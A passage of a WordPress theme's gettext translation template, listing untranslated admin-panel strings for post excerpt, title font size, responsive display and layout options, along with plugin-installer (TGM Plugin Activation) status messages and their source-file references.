backend/panels/blog-pages.php:2218 #: backend/panels/bookmark.php:316 backend/panels/bookmark.php:764 msgid "Enable or disable the bookmark icon." msgstr "" #: backend/category-settings.php:397 backend/panels/blog-pages.php:424 #: backend/panels/blog-pages.php:911 backend/panels/blog-pages.php:1325 #: backend/panels/blog-pages.php:1733 backend/panels/blog-pages.php:2225 #: backend/panels/bookmark.php:323 backend/panels/bookmark.php:771 msgid "Excerpt" msgstr "" #: backend/category-settings.php:398 msgid "Select settings for the post excerpt." msgstr "" #: backend/category-settings.php:402 backend/configs.php:210 msgid "Custom Settings Below" msgstr "" #: backend/category-settings.php:408 backend/panels/block-classic.php:90 #: backend/panels/block-grid.php:90 backend/panels/block-grid.php:255 #: backend/panels/block-grid.php:420 backend/panels/block-grid.php:593 #: backend/panels/block-grid.php:780 backend/panels/block-list.php:98 #: backend/panels/block-list.php:271 backend/panels/block-list.php:452 #: backend/panels/block-list.php:647 backend/panels/blog-pages.php:434 #: backend/panels/blog-pages.php:921 backend/panels/blog-pages.php:1335 #: backend/panels/blog-pages.php:1743 backend/panels/blog-pages.php:2235 #: backend/panels/bookmark.php:333 backend/panels/bookmark.php:781 msgid "Excerpt - Max Length" msgstr "" #: backend/category-settings.php:409 backend/panels/block-classic.php:91 #: backend/panels/block-grid.php:91 backend/panels/block-grid.php:256 #: backend/panels/block-grid.php:421 backend/panels/block-grid.php:594 #: backend/panels/block-grid.php:781 backend/panels/block-list.php:99 #: backend/panels/block-list.php:272 backend/panels/block-list.php:453 #: backend/panels/block-list.php:648 backend/panels/blog-pages.php:436 #: backend/panels/blog-pages.php:923 backend/panels/blog-pages.php:1337 #: backend/panels/blog-pages.php:1745 backend/panels/blog-pages.php:2237 #: backend/panels/bookmark.php:335 backend/panels/bookmark.php:783 msgid "select max length of the post excerpt." msgstr "" #: backend/category-settings.php:416 backend/panels/block-classic.php:97 #: backend/panels/block-grid.php:97 backend/panels/block-grid.php:262 #: backend/panels/block-grid.php:427 backend/panels/block-grid.php:600 #: backend/panels/block-grid.php:787 backend/panels/block-list.php:105 #: backend/panels/block-list.php:278 backend/panels/block-list.php:459 #: backend/panels/block-list.php:654 backend/panels/blog-pages.php:442 #: backend/panels/blog-pages.php:929 backend/panels/blog-pages.php:1343 #: backend/panels/blog-pages.php:1751 backend/panels/blog-pages.php:2243 #: backend/panels/bookmark.php:341 backend/panels/bookmark.php:789 msgid "Excerpt - Source" msgstr "" #: backend/category-settings.php:417 backend/panels/block-classic.php:98 #: backend/panels/block-grid.php:98 backend/panels/block-grid.php:263 #: backend/panels/block-grid.php:428 backend/panels/block-grid.php:601 #: backend/panels/block-grid.php:788 backend/panels/block-list.php:106 #: backend/panels/block-list.php:279 backend/panels/block-list.php:460 #: backend/panels/block-list.php:655 backend/panels/blog-pages.php:443 #: backend/panels/blog-pages.php:930 backend/panels/blog-pages.php:1344 #: backend/panels/blog-pages.php:1752 backend/panels/blog-pages.php:2244 #: backend/panels/bookmark.php:342 backend/panels/bookmark.php:790 msgid "Where to get the post excerpt." msgstr "" #: backend/category-settings.php:418 backend/panels/block-classic.php:99 #: backend/panels/block-grid.php:99 backend/panels/block-grid.php:264 #: backend/panels/block-grid.php:429 backend/panels/block-grid.php:602 #: backend/panels/block-grid.php:789 backend/panels/block-list.php:107 #: backend/panels/block-list.php:280 backend/panels/block-list.php:461 #: backend/panels/block-list.php:656 backend/panels/blog-pages.php:444 #: backend/panels/blog-pages.php:931 backend/panels/blog-pages.php:1345 #: backend/panels/blog-pages.php:1753 backend/panels/blog-pages.php:2245 #: backend/panels/bookmark.php:343 backend/panels/bookmark.php:791 msgid "" "When you select \"use title tagline\". if it is empty, it will fallback to the post " "excerpt or content." msgstr "" #: backend/category-settings.php:425 backend/panels/block-classic.php:106 #: backend/panels/block-grid.php:106 backend/panels/block-grid.php:271 #: backend/panels/block-grid.php:436 backend/panels/block-grid.php:609 #: backend/panels/block-grid.php:796 backend/panels/block-list.php:114 #: backend/panels/block-list.php:287 backend/panels/block-list.php:468 #: backend/panels/block-list.php:663 backend/panels/blog-pages.php:453 #: backend/panels/blog-pages.php:940 backend/panels/blog-pages.php:1354 #: backend/panels/blog-pages.php:1762 backend/panels/blog-pages.php:2254 #: backend/panels/bookmark.php:352 backend/panels/bookmark.php:800 #: backend/panels/design.php:535 backend/panels/typography.php:530 msgid "Read More Button" msgstr "" #: backend/category-settings.php:426 backend/panels/block-classic.php:107 #: backend/panels/block-grid.php:107 backend/panels/block-grid.php:272 #: backend/panels/block-grid.php:437 backend/panels/block-grid.php:610 #: backend/panels/block-grid.php:797 backend/panels/block-list.php:115 #: backend/panels/block-list.php:288 backend/panels/block-list.php:469 #: backend/panels/block-list.php:664 backend/panels/blog-pages.php:454 #: backend/panels/blog-pages.php:941 backend/panels/blog-pages.php:1355 #: backend/panels/blog-pages.php:1763 backend/panels/blog-pages.php:2255 #: backend/panels/bookmark.php:353 backend/panels/bookmark.php:801 msgid "Enable or disable the read more button." msgstr "" #: backend/category-settings.php:433 backend/panels/block-classic.php:120 #: backend/panels/block-grid.php:120 backend/panels/block-grid.php:285 #: backend/panels/block-grid.php:450 backend/panels/block-grid.php:623 #: backend/panels/block-grid.php:810 backend/panels/block-list.php:128 #: backend/panels/block-list.php:301 backend/panels/block-list.php:482 #: backend/panels/block-list.php:677 backend/panels/blog-pages.php:460 #: backend/panels/blog-pages.php:947 backend/panels/blog-pages.php:1361 #: backend/panels/blog-pages.php:1769 backend/panels/blog-pages.php:2261 #: backend/panels/bookmark.php:359 backend/panels/bookmark.php:807 msgid "Title HTML Tag" msgstr "" #: backend/category-settings.php:434 backend/panels/block-classic.php:121 #: backend/panels/block-grid.php:121 backend/panels/block-grid.php:286 #: backend/panels/block-grid.php:451 backend/panels/block-grid.php:624 #: backend/panels/block-grid.php:811 backend/panels/block-list.php:129 #: backend/panels/block-list.php:302 backend/panels/block-list.php:483 #: backend/panels/block-list.php:678 backend/panels/blog-pages.php:461 #: backend/panels/blog-pages.php:948 backend/panels/blog-pages.php:1362 #: backend/panels/blog-pages.php:1770 backend/panels/blog-pages.php:2262 #: backend/panels/bookmark.php:360 backend/panels/bookmark.php:808 msgid "Select a title HTML tag for the post title." msgstr "" #: backend/category-settings.php:441 backend/panels/blog-pages.php:468 #: backend/panels/blog-pages.php:955 backend/panels/blog-pages.php:1369 #: backend/panels/blog-pages.php:1777 backend/panels/blog-pages.php:2269 #: backend/panels/bookmark.php:367 backend/panels/bookmark.php:815 msgid "Desktop - Title Font Size" msgstr "" #: backend/category-settings.php:442 backend/panels/blog-pages.php:469 #: backend/panels/blog-pages.php:956 backend/panels/blog-pages.php:1370 #: backend/panels/blog-pages.php:1778 backend/panels/blog-pages.php:2270 #: backend/panels/bookmark.php:368 backend/panels/bookmark.php:816 msgid "" "Select a font size (px) for the post title in the desktop device. Leave blank to set " "it as the default." msgstr "" #: backend/category-settings.php:449 backend/panels/blog-pages.php:475 #: backend/panels/blog-pages.php:962 backend/panels/blog-pages.php:1376 #: backend/panels/blog-pages.php:1784 backend/panels/blog-pages.php:2276 #: backend/panels/bookmark.php:374 backend/panels/bookmark.php:822 msgid "Tablet - Title Font Size" msgstr "" #: backend/category-settings.php:450 backend/panels/blog-pages.php:476 #: backend/panels/blog-pages.php:963 backend/panels/blog-pages.php:1377 #: backend/panels/blog-pages.php:1785 backend/panels/blog-pages.php:2277 #: backend/panels/bookmark.php:375 backend/panels/bookmark.php:823 msgid "" "Select a font size (px) for the post title in the table devices. Leave blank to set it " "as the default." msgstr "" #: backend/category-settings.php:457 backend/panels/blog-pages.php:482 #: backend/panels/blog-pages.php:969 backend/panels/blog-pages.php:1383 #: backend/panels/blog-pages.php:1791 backend/panels/blog-pages.php:2283 #: backend/panels/bookmark.php:381 backend/panels/bookmark.php:829 msgid "Mobile - Title Font Size" msgstr "" #: backend/category-settings.php:458 backend/panels/blog-pages.php:483 #: backend/panels/blog-pages.php:970 backend/panels/blog-pages.php:1384 #: backend/panels/blog-pages.php:1792 backend/panels/blog-pages.php:2284 #: backend/panels/bookmark.php:382 backend/panels/bookmark.php:830 msgid "" "Select a font size (px) for the post title in the mobile device. Leave blank to set it " "as the default." msgstr "" #: backend/category-settings.php:465 backend/panels/block-classic.php:129 #: backend/panels/block-grid.php:129 backend/panels/block-grid.php:294 #: backend/panels/block-grid.php:459 backend/panels/block-grid.php:632 #: backend/panels/block-grid.php:819 backend/panels/block-list.php:137 #: backend/panels/block-list.php:310 backend/panels/block-list.php:491 #: backend/panels/block-list.php:686 backend/panels/blog-pages.php:490 #: backend/panels/blog-pages.php:977 backend/panels/blog-pages.php:1391 #: backend/panels/blog-pages.php:1799 backend/panels/blog-pages.php:2291 #: backend/panels/bookmark.php:389 backend/panels/bookmark.php:837 msgid "Responsive - Hide Entry Category" msgstr "" #: backend/category-settings.php:466 backend/panels/block-classic.php:130 #: backend/panels/block-grid.php:130 backend/panels/block-grid.php:295 #: backend/panels/block-grid.php:460 backend/panels/block-grid.php:633 #: backend/panels/block-grid.php:820 backend/panels/block-list.php:138 #: backend/panels/block-list.php:311 backend/panels/block-list.php:492 #: backend/panels/block-list.php:687 backend/panels/blog-pages.php:491 #: backend/panels/blog-pages.php:978 backend/panels/blog-pages.php:1392 #: backend/panels/blog-pages.php:1800 backend/panels/blog-pages.php:2292 #: backend/panels/bookmark.php:390 backend/panels/bookmark.php:838 msgid "Hide the entry category on the tablet and mobile devices." msgstr "" #: backend/category-settings.php:469 backend/category-settings.php:499 msgid "Default from Category Settings" msgstr "" #: backend/category-settings.php:470 backend/category-settings.php:500 #: backend/configs.php:254 backend/panels/blog-pages.php:494 #: backend/panels/blog-pages.php:524 backend/panels/blog-pages.php:981 #: backend/panels/blog-pages.php:1011 backend/panels/blog-pages.php:1395 #: backend/panels/blog-pages.php:1425 backend/panels/blog-pages.php:1803 #: backend/panels/blog-pages.php:1833 backend/panels/blog-pages.php:2295 #: backend/panels/blog-pages.php:2325 backend/panels/bookmark.php:393 #: backend/panels/bookmark.php:841 msgid "On Mobile" msgstr "" #: backend/category-settings.php:471 backend/category-settings.php:501 #: backend/configs.php:255 backend/panels/blog-pages.php:495 #: backend/panels/blog-pages.php:525 backend/panels/blog-pages.php:982 #: backend/panels/blog-pages.php:1012 backend/panels/blog-pages.php:1396 #: backend/panels/blog-pages.php:1426 backend/panels/blog-pages.php:1804 #: backend/panels/blog-pages.php:1834 backend/panels/blog-pages.php:2296 #: backend/panels/blog-pages.php:2326 backend/panels/bookmark.php:394 #: backend/panels/bookmark.php:842 msgid "On Tablet" msgstr "" #: backend/category-settings.php:472 backend/category-settings.php:502 #: backend/configs.php:256 backend/panels/blog-pages.php:496 #: backend/panels/blog-pages.php:526 backend/panels/blog-pages.php:983 #: backend/panels/blog-pages.php:1013 backend/panels/blog-pages.php:1397 #: backend/panels/blog-pages.php:1427 backend/panels/blog-pages.php:1805 #: backend/panels/blog-pages.php:1835 backend/panels/blog-pages.php:2297 #: backend/panels/blog-pages.php:2327 backend/panels/bookmark.php:395 #: backend/panels/bookmark.php:843 msgid "On Tablet & Mobile" msgstr "" #: backend/category-settings.php:479 backend/panels/block-classic.php:138 #: backend/panels/block-grid.php:138 backend/panels/block-grid.php:303 #: backend/panels/block-grid.php:468 backend/panels/block-grid.php:641 #: backend/panels/block-grid.php:828 backend/panels/block-list.php:146 #: backend/panels/block-list.php:319 backend/panels/block-list.php:500 #: backend/panels/block-list.php:695 backend/panels/blog-pages.php:504 #: backend/panels/blog-pages.php:991 backend/panels/blog-pages.php:1405 #: backend/panels/blog-pages.php:1813 backend/panels/blog-pages.php:2305 #: backend/panels/bookmark.php:403 backend/panels/bookmark.php:851 msgid "Tablet - Hide Entry Meta" msgstr "" #: backend/category-settings.php:480 msgid "" "Input entry meta tags to hide on the tablet devices, separate by comma. For example: " "avatar, author... Keys include: [avatar, author, date, category, tag, view, comment, " "update, read, custom]. Input -1 to re-enable all meta." msgstr "" #: backend/category-settings.php:482 backend/category-settings.php:490 #: backend/panels/blog-pages.php:506 backend/panels/blog-pages.php:514 #: backend/panels/blog-pages.php:993 backend/panels/blog-pages.php:1001 #: backend/panels/blog-pages.php:1407 backend/panels/blog-pages.php:1415 #: backend/panels/blog-pages.php:1815 backend/panels/blog-pages.php:1823 #: backend/panels/blog-pages.php:2307 backend/panels/blog-pages.php:2315 #: backend/panels/bookmark.php:405 backend/panels/bookmark.php:853 #: backend/panels/bookmark.php:861 backend/panels/single-post.php:610 msgid "avatar,author" msgstr "" #: backend/category-settings.php:487 backend/panels/block-classic.php:147 #: backend/panels/block-grid.php:147 backend/panels/block-grid.php:312 #: backend/panels/block-grid.php:477 backend/panels/block-grid.php:650 #: backend/panels/block-grid.php:837 backend/panels/block-list.php:155 #: backend/panels/block-list.php:328 backend/panels/block-list.php:509 #: backend/panels/block-list.php:704 backend/panels/blog-pages.php:512 #: backend/panels/blog-pages.php:999 backend/panels/blog-pages.php:1413 #: backend/panels/blog-pages.php:1821 backend/panels/blog-pages.php:2313 #: backend/panels/bookmark.php:859 backend/panels/single-post.php:608 #: backend/panels/single-post.php:617 msgid "Mobile - Hide Entry Meta" msgstr "" #: backend/category-settings.php:488 msgid "" "Input entry meta tags to hide on the mobile devices, separate by comma. For example: " "avatar, author... Keys include: [avatar, author, date, category, tag, view, comment, " "update, read, custom]. Input -1 to re-enable all meta." msgstr "" #: backend/category-settings.php:495 backend/panels/block-classic.php:155 #: backend/panels/block-grid.php:155 backend/panels/block-grid.php:320 #: backend/panels/block-grid.php:485 backend/panels/block-grid.php:658 #: backend/panels/block-grid.php:845 backend/panels/block-list.php:163 #: backend/panels/block-list.php:336 backend/panels/block-list.php:517 #: backend/panels/block-list.php:712 backend/panels/blog-pages.php:520 #: backend/panels/blog-pages.php:1007 backend/panels/blog-pages.php:1421 #: backend/panels/blog-pages.php:1829 backend/panels/blog-pages.php:2321 #: backend/panels/bookmark.php:411 backend/panels/bookmark.php:867 msgid "Responsive - Hide Excerpt" msgstr "" #: backend/category-settings.php:496 backend/panels/block-classic.php:156 #: backend/panels/block-grid.php:156 backend/panels/block-grid.php:321 #: backend/panels/block-grid.php:486 backend/panels/block-grid.php:659 #: backend/panels/block-grid.php:846 backend/panels/block-list.php:164 #: backend/panels/block-list.php:337 backend/panels/block-list.php:518 #: backend/panels/block-list.php:713 backend/panels/blog-pages.php:521 #: backend/panels/blog-pages.php:1008 backend/panels/blog-pages.php:1422 #: backend/panels/blog-pages.php:1830 backend/panels/blog-pages.php:2322 #: backend/panels/bookmark.php:412 backend/panels/bookmark.php:868 msgid "Hide the post excerpt on the tablet and mobile devices." msgstr "" #: backend/class-tgm-plugin-activation.php:339 backend/install-plugins.php:66 msgid "Install Required Plugins" msgstr "" #: backend/class-tgm-plugin-activation.php:340 backend/install-plugins.php:67 msgid "Install Plugins" msgstr "" #: backend/class-tgm-plugin-activation.php:342 backend/install-plugins.php:68 #, php-format msgid "Installing Plugin: %s" msgstr "" #: backend/class-tgm-plugin-activation.php:344 #, php-format msgid "Updating Plugin: %s" msgstr "" #: backend/class-tgm-plugin-activation.php:345 backend/install-plugins.php:69 msgid "Something went wrong with the plugin API." msgstr "" #: backend/class-tgm-plugin-activation.php:348 #, php-format msgid "This theme requires the following plugin: %1$s." msgstr "" #: backend/class-tgm-plugin-activation.php:354 #, php-format msgid "This theme recommends the following plugin: %1$s." msgstr "" #: backend/class-tgm-plugin-activation.php:360 #, php-format msgid "" "The following plugin needs to be updated to its latest version to ensure maximum " "compatibility with this theme: %1$s." msgstr "" #: backend/class-tgm-plugin-activation.php:366 #, php-format msgid "There is an update available for: %1$s." msgstr "" #: backend/class-tgm-plugin-activation.php:372 backend/install-plugins.php:73 #, php-format msgid "The following required plugin is currently inactive: %1$s." msgstr "" #: backend/class-tgm-plugin-activation.php:378 backend/install-plugins.php:74 #, php-format msgid "The following recommended plugin is currently inactive: %1$s." msgstr "" #: backend/class-tgm-plugin-activation.php:383 backend/install-plugins.php:78 msgid "Begin installing plugin" msgstr "" #: backend/class-tgm-plugin-activation.php:388 msgid "Begin updating plugin" msgstr "" #: backend/class-tgm-plugin-activation.php:393 backend/install-plugins.php:79 msgid "Begin activating plugin" msgstr "" #: backend/class-tgm-plugin-activation.php:397 backend/install-plugins.php:80 msgid "Return to Required Plugins Installer" msgstr "" #: backend/class-tgm-plugin-activation.php:398 #: backend/class-tgm-plugin-activation.php:920 #: backend/class-tgm-plugin-activation.php:2627 #: backend/class-tgm-plugin-activation.php:3674 msgid "Return to the Dashboard" msgstr "" #: backend/class-tgm-plugin-activation.php:399 #: backend/class-tgm-plugin-activation.php:3253 backend/install-plugins.php:81 msgid "Plugin activated successfully." msgstr "" #: backend/class-tgm-plugin-activation.php:400 #: backend/class-tgm-plugin-activation.php:3046 msgid "The following plugin was activated successfully:" msgstr "" #: backend/class-tgm-plugin-activation.php:402 #, php-format msgid "No action taken. Plugin %1$s was already active." msgstr "" #: backend/class-tgm-plugin-activation.php:404 #, php-format msgid "" "Plugin not activated. A higher version of %s is needed for this theme. Please update " "the plugin." msgstr "" #: backend/class-tgm-plugin-activation.php:406 #, php-format msgid "All plugins installed and activated successfully. %1$s" msgstr "" #: backend/class-tgm-plugin-activation.php:407 msgid "Dismiss this notice" msgstr "" #: backend/class-tgm-plugin-activation.php:408 msgid "" "There are one or more required or recommended plugins to install, update or activate." msgstr "" #: backend/class-tgm-plugin-activation.php:409 msgid "Please contact the administrator of this site for help." msgstr "" #: backend/class-tgm-plugin-activation.php:615 msgid "This plugin needs to be updated to be compatible with your theme." msgstr "" #: backend/class-tgm-plugin-activation.php:616 msgid "Update Required" msgstr "" #: backend/class-tgm-plugin-activation.php:1027 msgid "" "The remote plugin package does not contain a folder with the desired slug and renaming " "did not work." msgstr "" #: backend/class-tgm-plugin-activation.php:1027 #: backend/class-tgm-plugin-activation.php:1030 msgid "" "Please contact the plugin provider and ask them to package their plugin according to " "the WordPress guidelines." msgstr "" #: backend/class-tgm-plugin-activation.php:1030 msgid "" "The remote plugin package consists of more than one file, but the files are not " "packaged in a folder." msgstr "" #: backend/class-tgm-plugin-activation.php:2076 #, php-format msgid "TGMPA v%s" msgstr "" #: backend/class-tgm-plugin-activation.php:2367 msgid "Required" msgstr "" #: backend/class-tgm-plugin-activation.php:2370 backend/panels/bookmark.php:502 msgid "Recommended" msgstr "" #: backend/class-tgm-plugin-activation.php:2386 msgid "WordPress Repository" msgstr "" #: backend/class-tgm-plugin-activation.php:2389 msgid "External Source" msgstr "" #: backend/class-tgm-plugin-activation.php:2392 msgid "Pre-Packaged" msgstr "" #: backend/class-tgm-plugin-activation.php:2409 msgid "Not Installed" msgstr "" #: backend/class-tgm-plugin-activation.php:2413 msgid "Installed But Not Activated" msgstr "" #: backend/class-tgm-plugin-activation.php:2415 msgid "Active" msgstr "" #: backend/class-tgm-plugin-activation.php:2421 msgid "Required Update not Available" msgstr "" #: backend/class-tgm-plugin-activation.php:2424 msgid "Requires Update" msgstr "" #: backend/class-tgm-plugin-activation.php:2427 msgid "Update recommended" msgstr "" #: backend/class-tgm-plugin-activation.php:2436 #, php-format msgid "%1$s, %2$s" msgstr "" #: backend/class-tgm-plugin-activation.php:2482 #, php-format msgid "All (%s)" msgid_plural "All (%s)" msgstr[0] "" msgstr[1] "" #: backend/class-tgm-plugin-activation.php:2486 #, php-format msgid "To Install (%s)" msgstr "" #: backend/class-tgm-plugin-activation.php:2490 #, php-format msgid "Update Available (%s)" msgstr "" #: backend/class-tgm-plugin-activation.php:2494 #, php-format msgid "To Activate (%s)" msgstr "" #: backend/class-tgm-plugin-activation.php:2576 msgid "unknown" msgstr "" #: backend/class-tgm-plugin-activation.php:2584 msgid "Installed version:" msgstr "" #: backend/class-tgm-plugin-activation.php:2592 msgid "Minimum required version:" msgstr "" #: backend/class-tgm-plugin-activation.php:2604 msgid "Available version:" msgstr "" #: backend/class-tgm-plugin-activation.php:2627 msgid "No plugins to install, update or activate." msgstr "" #: backend/class-tgm-plugin-activation.php:2641 msgid "Plugin" msgstr "" #: backend/class-tgm-plugin-activation.php:2642 msgid "Source" msgstr "" #: backend/class-tgm-plugin-activation.php:2643 msgid "Type" msgstr "" #: backend/class-tgm-plugin-activation.php:2647 msgid "Version" msgstr "" #: backend/class-tgm-plugin-activation.php:2648 msgid "Status" msgstr "" #: backend/class-tgm-plugin-activation.php:2697 #, php-format msgid "Install %2$s" msgstr "" #: backend/class-tgm-plugin-activation.php:2702 #, php-format msgid "Update %2$s" msgstr "" #: backend/class-tgm-plugin-activation.php:2708 #, php-format msgid "Activate %2$s" msgstr "" #: backend/class-tgm-plugin-activation.php:2778 msgid "Upgrade message from the plugin author:" msgstr "" #: backend/class-tgm-plugin-activation.php:2811 msgid "Install" msgstr "" #: backend/class-tgm-plugin-activation.php:2817 msgid "Update" msgstr "" #: backend/class-tgm-plugin-activation.php:2820 msgid "Activate" msgstr "" #: backend/class-tgm-plugin-activation.php:2851 msgid "No plugins were selected to be installed. No action taken." msgstr "" #: backend/class-tgm-plugin-activation.php:2853 msgid "No plugins were selected to be updated. No action taken." msgstr "" #: backend/class-tgm-plugin-activation.php:2894 msgid "No plugins are available to be installed at this time." msgstr "" #: backend/class-tgm-plugin-activation.php:2896 msgid "No plugins are available to be updated at this time." msgstr "" #: backend/class-tgm-plugin-activation.php:3002 msgid "No plugins were selected to be activated. No action taken." msgstr "" #: backend/class-tgm-plugin-activation.php:3028 msgid "No plugins are available to be activated at this time." msgstr "" #: backend/class-tgm-plugin-activation.php:3252 msgid "Plugin activation failed." msgstr "" #: backend/class-tgm-plugin-activation.php:3592 #, php-format msgid "Updating Plugin %1$s (%2$d/%3$d)" msgstr "" #: backend/class-tgm-plugin-activation.php:3595 #, php-format msgid "An error occurred while installing %1$s: %2$s." msgstr "" #: backend/class-tgm-plugin-activation.php:3597 #, php-format msgid "The installation of %1$s failed." msgstr "" #: backend/class-tgm-plugin-activation.php:3601 msgid "" "The installation and activation process is starting. This process may take a while on " "some hosts, so please be patient." msgstr "" #: backend/class-tgm-plugin-activation.php:3603 #, php-format msgid "%1$s installed and activated successfully." msgstr "" #: backend/class-tgm-plugin-activation.php:3604 msgid "All installations and activations have been completed." msgstr "" #: backend/class-tgm-plugin-activation.php:3606 #, php-format msgid "Installing and Activating Plugin %1$s (%2$d/%3$d)" msgstr "" #: backend/class-tgm-plugin-activation.php:3609 msgid "" "The installation process is starting. This process may take a while on some hosts, so " "please be patient." msgstr "" #: backend/class-tgm-plugin-activation.php:3611 #, php-format msgid "%1$s installed successfully." msgstr "" #: backend/class-tgm-plugin-activation.php:3612 msgid "All installations have been completed." msgstr "" #: backend/class-tgm-plugin-activation.php:3614 #, php-format msgid "Installing Plugin %1$s (%2$d/%3$d)" msgstr "" #: backend/configs.php:48 includes/sidebars.php:70 msgid "Standard Sidebar" msgstr "" #: backend/configs.php:72 msgid "Style 1 (Left Menu)" msgstr "" #: backend/configs.php:73 msgid "Style 2 (Right Menu)" msgstr "" #: backend/configs.php:74 msgid "Style 3 (Center Menu)" msgstr "" #: backend/configs.php:75 msgid "Style 4 (Border)" msgstr "" #: backend/configs.php:76 msgid "Style 5 (Center Logo)" msgstr "" #: backend/configs.php:80 msgid "Transparent - Style 1" msgstr "" #: backend/configs.php:81 msgid "Transparent - Style 2" msgstr "" #: backend/configs.php:82 msgid "Transparent - Style 3" msgstr "" #: backend/configs.php:86 backend/panels/footer.php:98 msgid "Use Ruby Template" msgstr "" #: backend/configs.php:107 backend/configs.php:638 backend/configs.php:697 #: backend/configs.php:736 backend/configs.php:775 msgid "Layout 1" msgstr "" #: backend/configs.php:108 backend/configs.php:642 backend/configs.php:701 #: backend/configs.php:740 backend/configs.php:779 msgid "Layout 2" msgstr "" #: backend/configs.php:109 backend/configs.php:646 backend/configs.php:705 #: backend/configs.php:744 backend/configs.php:783 msgid "Layout 3" msgstr "" #: backend/configs.php:110 backend/configs.php:650 backend/configs.php:709 #: backend/configs.php:748 msgid "Layout 4" msgstr "" #: backend/configs.php:111 backend/configs.php:654 msgid "Layout 5" msgstr "" #: backend/configs.php:112 backend/configs.php:658 msgid "Layout 6" msgstr "" #: backend/configs.php:113 backend/configs.php:662 msgid "Layout 7" msgstr "" #: backend/configs.php:114 backend/configs.php:666 msgid "Layout 8" msgstr "" #: backend/configs.php:115 msgid "Layout 9" msgstr "" #: backend/configs.php:116 msgid "Layout 10" msgstr "" #: backend/configs.php:117 msgid "Layout 11" msgstr "" #: backend/configs.php:118 msgid "Layout 12" msgstr "" #: backend/configs.php:119 msgid "Layout 13" msgstr "" #: backend/configs.php:120 msgid "Layout 1 - Center" msgstr "" #: backend/configs.php:121 msgid "Layout 2 - Center" msgstr "" #: backend/configs.php:122 msgid "Layout 3 - Center" msgstr "" #: backend/configs.php:123 msgid "Layout 4 - Center" msgstr "" #: backend/configs.php:124 msgid "Layout 5 - Center" msgstr "" #: backend/configs.php:125 msgid "Layout 6 - Center" msgstr "" #: backend/configs.php:126 msgid "Layout 7 - Center" msgstr "" #: backend/configs.php:127 msgid "Layout 8 - Center" msgstr "" #: backend/configs.php:128 msgid "Layout 9 - Center" msgstr "" #: backend/configs.php:129 msgid "Layout 10 - Center" msgstr "" #: backend/configs.php:130 msgid "Layout 11 - Center" msgstr "" #: backend/configs.php:131 msgid "Layout 12 - Center" msgstr "" #: backend/configs.php:132 msgid "Layout 13 - Center" msgstr "" #: backend/configs.php:168 backend/configs.php:543 msgid "No Sidebar" msgstr "" #: backend/configs.php:175 backend/configs.php:544 backend/configs.php:823 msgid "Left" msgstr "" #: backend/configs.php:181 backend/configs.php:545 backend/configs.php:824 #: backend/panels/login.php:42 msgid "Right" msgstr "" #: backend/configs.php:223 msgid "Use Post Excerpt" msgstr "" #: backend/configs.php:224 msgid "Use Title Tagline" msgstr "" #: backend/configs.php:237 msgid "H1" msgstr "" #: backend/configs.php:238 backend/panels/single-post.php:532 #: backend/single-metaboxes.php:224 msgid "H2" msgstr "" #: backend/configs.php:239 backend/panels/single-post.php:533 #: backend/single-metaboxes.php:225 msgid "H3" msgstr "" #: backend/configs.php:240 backend/panels/single-post.php:534 #: backend/single-metaboxes.php:226 msgid "H4" msgstr "" #: backend/configs.php:241 backend/panels/single-post.php:535 #: backend/single-metaboxes.php:227 msgid "H5" msgstr "" #: backend/configs.php:242 backend/panels/single-post.php:536 #: backend/single-metaboxes.php:228 msgid "H6" msgstr "" #: backend/configs.php:243 msgid "p tag" msgstr "" #: backend/configs.php:244 backend/panels/single-post.php:537 #: backend/single-metaboxes.php:230 msgid "span" msgstr "" #: backend/configs.php:253 backend/mega-menu.php:168 backend/panels/bookmark.php:573 #: backend/panels/login.php:29 msgid "- Disable -" msgstr "" #: backend/configs.php:289 backend/configs.php:320 msgid "Background 1" msgstr "" #: backend/configs.php:290 backend/configs.php:321 msgid "Background 1 (Big)" msgstr "" #: backend/configs.php:291 backend/configs.php:322 msgid "Background 2" msgstr "" #: backend/configs.php:292 backend/configs.php:323 msgid "Background 2 (Big)" msgstr "" #: backend/configs.php:293 backend/configs.php:324 msgid "Background 3" msgstr "" #: backend/configs.php:294 backend/configs.php:325 msgid "Background 3 (Big)" msgstr "" #: backend/configs.php:295 backend/configs.php:326 msgid "Background 4" msgstr "" #: backend/configs.php:296 backend/configs.php:327 msgid "Background 4 (Big)" msgstr "" #: backend/configs.php:328 msgid "Only Text" msgstr "" #: backend/configs.php:329 msgid "Only Text (Big)" msgstr "" #: backend/configs.php:330 backend/configs.php:874 msgid "Border" msgstr "" #: backend/configs.php:331 msgid "Border (Big)" msgstr "" #: backend/configs.php:332 msgid "Bottom Dotted" msgstr "" #: backend/configs.php:333 msgid "Bottom Dotted (Big)" msgstr "" #: backend/configs.php:334 backend/panels/blog-pages.php:51 #: backend/panels/blog-pages.php:617 backend/panels/blog-pages.php:1935 #: backend/panels/header-style.php:72 backend/panels/header-style.php:617 #: backend/single-metaboxes.php:134 backend/single-metaboxes.php:911 msgid "Bottom Border" msgstr "" #: backend/configs.php:335 msgid "Bottom Border (Big)" msgstr "" #: backend/configs.php:336 msgid "Left Dot" msgstr "" #: backend/configs.php:359 msgid "Use Custom" msgstr "" #: backend/configs.php:374 msgid "Bottom Right" msgstr "" #: backend/configs.php:375 msgid "Bottom Right (Big Icon)" msgstr "" #: backend/configs.php:376 msgid "Top" msgstr "" #: backend/configs.php:377 msgid "Top (Big Icon)" msgstr "" #: backend/configs.php:378 msgid "After Entry Category" msgstr "" #: backend/configs.php:379 backend/panels/login.php:41 msgid "Center" msgstr "" #: backend/configs.php:380 msgid "Center (Big Icon)" msgstr "" #: backend/configs.php:401 msgid "avatar (Avatar)" msgstr "" #: backend/configs.php:402 backend/panels/design.php:268 msgid "author (Author)" msgstr "" #: backend/configs.php:403 backend/panels/design.php:269 msgid "date (Publish Date)" msgstr "" #: backend/configs.php:404 backend/panels/design.php:270 msgid "category (Categories)" msgstr "" #: backend/configs.php:405 backend/panels/design.php:271 msgid "tag (Tags)" msgstr "" #: backend/configs.php:406 backend/panels/design.php:272 msgid "view (Post Views)" msgstr "" #: backend/configs.php:407 backend/panels/design.php:273 msgid "comment (Comments)" msgstr "" #: backend/configs.php:408 backend/panels/design.php:274 msgid "update (Last Updated)" msgstr "" #: backend/configs.php:409 backend/panels/design.php:275 msgid "read (Reading Time)" msgstr "" #: backend/configs.php:410 msgid "custom (Custom)" msgstr "" #: backend/configs.php:426 msgid "Replace for Entry Meta" msgstr "" #: backend/configs.php:471 backend/panels/block-list.php:17 msgid "List 1 (Standard)" msgstr "" #: backend/configs.php:500 backend/mega-menu.php:47 msgid "1 Column" msgstr "" #: backend/configs.php:501 backend/mega-menu.php:48 backend/panels/header.php:130 msgid "2 